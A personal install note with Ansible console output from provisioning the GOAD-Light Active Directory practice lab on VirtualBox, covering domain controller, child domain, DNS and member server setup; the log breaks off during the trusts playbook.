GOAD

GOAD install

Ubuntu 20 + VirtualBox 7.1



Reference used: https://github.com/Orange-Cyberdefense/GOAD/issues/281



The commands to provision:

complete

bolke@hacky:~/GOAD$ ./goad.sh 

   _____   _____          _____ 
  / ____| / ||| \   /\   |  __ \
 | |  __||  |||  | /  \  | |  | |
 | | |_ ||  |||  |/ /\ \ | |  | |
 | |__| ||  |||  / /__\ \| |__| |
  \_____| \_|||_/________\_____/
    Game Of Active Directory
      Pwning is coming

Goad management console type help or ? to list commands

[*] Start Loading default instance
[+] Instance 850bec-goad-light-virtualbox loaded 
[*] lab instances :
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┓
┃ Instance ID                    ┃ Lab        ┃ Provider   ┃ IP Range        ┃ Status                 ┃ Is Default ┃ Extensions ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━┩
│ > 850bec-goad-light-virtualbox │ GOAD-Light │ virtualbox │ 192.168.56.0/24 │ ready for provisioning │ Yes        │            │
└────────────────────────────────┴────────────┴────────────┴─────────────────┴────────────────────────┴────────────┴────────────┘

GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision
provision            provision_extension  provision_lab        provision_lab_from   

GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision_lab
[*] Loading inventory
[+] Lab inventory : /home/bolke/GOAD/ad/GOAD-Light/data/inventory file found 
[+] Provider inventory : /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory file found 
[+] Global inventory : /home/bolke/GOAD/globalsettings.ini file found 
[*] Loading playbook list
[+] build.yml file found 
[+] ad-servers.yml file found 
[+] ad-parent_domain.yml file found 
[+] ad-child_domain.yml file found 
[+] wait5m.yml file found 
[+] ad-members.yml file found 
[+] ad-trusts.yml file found 
[+] ad-data.yml file found 
[+] ad-gmsa.yml file found 
[+] laps.yml file found 
[+] ad-relations.yml file found 
[+] adcs.yml file found 
[+] ad-acl.yml file found 
[+] servers.yml file found 
[+] security.yml file found 
[+] vulnerabilities.yml file found 
[*] Run playbook : build.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
build.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [build all] *******************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: common : Force a DNS on the adapter {{nat_adapter}} on dc01]
 [started TASK: common : Force a DNS on the adapter {{nat_adapter}} on dc02]
 [started TASK: common : Force a DNS on the adapter {{nat_adapter}} on srv02]
 [started TASK: common : Set a proxy for specific protocols on dc01]
 [started TASK: common : Set a proxy for specific protocols on dc02]
 [started TASK: common : Set a proxy for specific protocols on srv02]
 [started TASK: common : Configure IE to use a specific proxy per protocol on dc01]
 [started TASK: common : Configure IE to use a specific proxy per protocol on dc02]
 [started TASK: common : Configure IE to use a specific proxy per protocol on srv02]
 [started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on dc01]
 [started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on dc02]
 [started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on srv02]

TASK [common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version] ***************************************************************************************************
changed: [dc01]
changed: [srv02]
changed: [dc02]
 [started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on dc01]
 [started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on dc02]
 [started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on srv02]

TASK [common : Windows | Check for ComputerManagementDsc Powershell module] ********************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: common : Windows | Enable Remote Desktop on dc01]
 [started TASK: common : Windows | Enable Remote Desktop on dc02]
 [started TASK: common : Windows | Enable Remote Desktop on srv02]

TASK [common : Windows | Enable Remote Desktop] ************************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: common : Windows | Check for xNetworking Powershell module on dc01]
 [started TASK: common : Windows | Check for xNetworking Powershell module on dc02]
 [started TASK: common : Windows | Check for xNetworking Powershell module on srv02]

TASK [common : Windows | Check for xNetworking Powershell module] ******************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: common : Firewall | Allow RDP through Firewall on dc01]
 [started TASK: common : Firewall | Allow RDP through Firewall on dc02]
 [started TASK: common : Firewall | Allow RDP through Firewall on srv02]

TASK [common : Firewall | Allow RDP through Firewall] ******************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: common : Add a network static route on dc01]
 [started TASK: common : Add a network static route on dc02]
 [started TASK: common : Add a network static route on srv02]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key on dc01]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key on dc02]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key on srv02]

TASK [settings/keyboard : Add Keyboard Layouts registry key] ***********************************************************************************************************************************************
ok: [dc01] => (item=0000040C)
ok: [dc02] => (item=0000040C)
ok: [srv02] => (item=0000040C)
ok: [dc01] => (item=00000409)
ok: [srv02] => (item=00000409)
ok: [dc02] => (item=00000409)
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on dc01]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on dc02]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on srv02]

TASK [settings/keyboard : Add Keyboard Layouts registry key for default users] *****************************************************************************************************************************
ok: [srv02] => (item=0000040C)
ok: [dc02] => (item=0000040C)
ok: [dc01] => (item=0000040C)
ok: [srv02] => (item=00000409)
ok: [dc02] => (item=00000409)
ok: [dc01] => (item=00000409)

PLAY [build all no update] *********************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: settings/no_updates : Disable windows update on dc01]
 [started TASK: settings/no_updates : Disable windows update on dc02]

TASK [settings/no_updates : Disable windows update] ********************************************************************************************************************************************************
changed: [dc01]
changed: [dc02]

PLAY [Launch windows updates before continue] **************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=16   changed=2    unreachable=0    failed=0    skipped=5    rescued=0    ignored=0   
dc02                       : ok=11   changed=2    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   
srv02                      : ok=10   changed=1    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   

[*] Run playbook : ad-servers.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Prepare servers set admin password, set hostname] ****************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: settings/admin_password : Ensure that Admin is present with a valid password on dc01]
 [started TASK: settings/admin_password : Ensure that Admin is present with a valid password on dc02]
 [started TASK: settings/admin_password : Ensure that Admin is present with a valid password on srv02]

TASK [settings/admin_password : Ensure that Admin is present with a valid password] ************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: settings/hostname : Change the hostname on dc01]
 [started TASK: settings/hostname : Change the hostname on dc02]
 [started TASK: settings/hostname : Change the hostname on srv02]

TASK [settings/hostname : Change the hostname] *************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: settings/hostname : Reboot if needed on dc01]
 [started TASK: settings/hostname : Reboot if needed on dc02]
 [started TASK: settings/hostname : Reboot if needed on srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=9    changed=0    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   

[*] Run playbook : ad-parent_domain.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-parent_domain.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Main DC AD configuration] ****************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : disable the registration of the {{nat_adapter}} interface (NAT address) in DNS on dc01]

TASK [domain_controller : disable the registration of the Ethernet interface (NAT address) in DNS] *********************************************************************************************************
changed: [dc01]
 [started TASK: domain_controller : Ensure that domain exists on dc01]

TASK [domain_controller : Ensure that domain exists] *******************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Reboot to complete domain creation on dc01]
 [started TASK: domain_controller : Ensure the server is a domain controller on dc01]

TASK [domain_controller : Ensure the server is a domain controller] ****************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Reboot to complete domain controller setup on dc01]
 [started TASK: domain_controller : Be sure DNS feature is installed on dc01]

TASK [domain_controller : Be sure DNS feature is installed] ************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Check for xDnsServer Powershell module on dc01]

TASK [domain_controller : Check for xDnsServer Powershell module] ******************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : enable only the {{domain_adapter}} interface (local) for DNS client requests on dc01]

TASK [domain_controller : enable only the Ethernet 2 interface (local) for DNS client requests] ************************************************************************************************************
changed: [dc01]
 [started TASK: domain_controller : Configure DNS Forwarders on dc01]

TASK [domain_controller : Configure DNS Forwarders] ********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Install XactiveDirectory on dc01]

TASK [domain_controller : Install XactiveDirectory] ********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Ensure Administrator is part of Enterprise Admins on dc01]

TASK [domain_controller : Ensure Administrator is part of Enterprise Admins] *******************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Ensure Administrator is part of Domain Admins on dc01]

TASK [domain_controller : Ensure Administrator is part of Domain Admins] ***********************************************************************************************************************************
ok: [dc01]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=17   changed=2    unreachable=0    failed=0    skipped=3    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-child_domain.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-child_domain.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Child DC AD configuration] ***************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : disable the registration of the {{nat_adapter}} interface (NAT address) in DNS on dc02]

TASK [child_domain : disable the registration of the Ethernet interface (NAT address) in DNS] **************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Set configure dns to {{dns_domain}} on dc02]

TASK [child_domain : Set configure dns to dc01] ************************************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Install windows features - AD Domain Services on dc02]

TASK [child_domain : Install windows features - AD Domain Services] ****************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : Install windows features - RSAT-ADDS on dc02]

TASK [child_domain : Install windows features - RSAT-ADDS] *************************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : add child domain to parent domain on dc02]

TASK [child_domain : add child domain to parent domain] ****************************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : Reboot on dc02]
 [started TASK: child_domain : enable the {{domain_adapter}} interface (local) for DNS client requests on dc02]

TASK [child_domain : enable the Ethernet 2 interface (local) for DNS client requests] **********************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Check for xDnsServer Powershell module on dc02]

TASK [child_domain : Check for xDnsServer Powershell module] ***********************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Configure DNS Forwarders on dc02]

TASK [child_domain : Configure DNS Forwarders] *************************************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Install XactiveDirectory on dc02]

TASK [child_domain : Install XactiveDirectory] *************************************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : enable the Active directory web services if not enabled on dc02]

TASK [child_domain : enable the Active directory web services if not enabled] ******************************************************************************************************************************
changed: [dc02]
 [started TASK: dns_conditional_forwarder : Add dns server zone on dc02]

TASK [dns_conditional_forwarder : Add dns server zone] *****************************************************************************************************************************************************
changed: [dc02]

PLAY [Parent DC ADD DNS configuration] *********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: parent_child_dns : add dns delegation to child domain on dc01]

TASK [parent_child_dns : add dns delegation to child domain] ***********************************************************************************************************************************************
changed: [dc01] => (item=north.sevenkingdoms.local)
 [started TASK: parent_child_dns : create conditional forwarder to child domain on dc01]

TASK [parent_child_dns : create conditional forwarder to child domain] *************************************************************************************************************************************
changed: [dc01] => (item=north.sevenkingdoms.local)

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=9    changed=2    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=13   changed=8    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : wait5m.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini wait5m.yml

PLAY [wait] ************************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on localhost]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [localhost]
 [started TASK: Wait 5 minutes to finish on localhost]
Pausing for 300 seconds
(ctrl+C then 'C' = continue early, ctrl+C then 'A' = abort)
Press 'C' to continue the play or 'A' to abort 

TASK [Wait 5 minutes to finish] ****************************************************************************************************************************************************************************
ok: [localhost]

PLAY RECAP *************************************************************************************************************************************************************************************************
localhost                  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-members.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini ad-members.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [play servers AD configuration] ***********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: member_server : prioritize the {{domain_adapter}} interface (local) as the default for routing on srv02]

TASK [member_server : prioritize the Ethernet 2 interface (local) as the default for routing] **************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Set configure dns to {{dns_domain}} on srv02]

TASK [member_server : Set configure dns to dc02] ***********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Verify File Server Role is installed. on srv02]

TASK [member_server : Verify File Server Role is installed.] ***********************************************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Add member server on srv02]

TASK [member_server : Add member server] *******************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Reboot if needed on srv02]


TASK [member_server : Reboot if needed] ********************************************************************************************************************************************************************
changed: [srv02]

PLAY [play workstations AD configuration] ******************************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=7    changed=5    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-trusts.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini ad-trusts.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
